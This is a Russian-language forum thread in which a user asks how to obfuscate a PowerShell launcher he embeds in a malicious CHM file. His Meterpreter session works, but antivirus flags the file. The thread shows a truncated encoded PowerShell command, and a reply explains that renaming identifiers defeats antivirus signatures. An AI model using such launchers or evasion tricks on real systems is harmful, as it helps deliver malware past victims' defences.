• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Обфускация powershell-кода для последующего внедрения в CHM-файл

AlCat

Active member
30.10.2018
38
0
BIT
2
Сгенерирован код.
Код:
powershell -w 1 -C sv YnA -;sv n ec;sv GHP ((gv YnA).value.toString()+(gv n).value.toString());powershell (gv GHP).value.toString() 'JAB3AFYAUwBBACAAPQAgACcAJA....,бла-бла-еще_много_букавок_H0A'
Позже код используется для внедрения в CHM-файл как описано тут Вредоносные CHM
Всё работает, сессия метерпертера прилетает, но палится сие антивирусами. То есть нужно провести обфускацию.

Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
 

f22

Codeby Academy
Gold Team
05.05.2019
1 844
225
BIT
1 124
Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

 

AlCat

Active member
30.10.2018
38
0
BIT
2
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Спасибо что обратили внимание на мой вопрос.
Касаемо статьи на "хакере" - .

...все таки с проблемой нужно переспать. )
С утра соображается лучше.
 
Последнее редактирование:

f22

Codeby Academy
Gold Team
05.05.2019
1 844
225
BIT
1 124
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!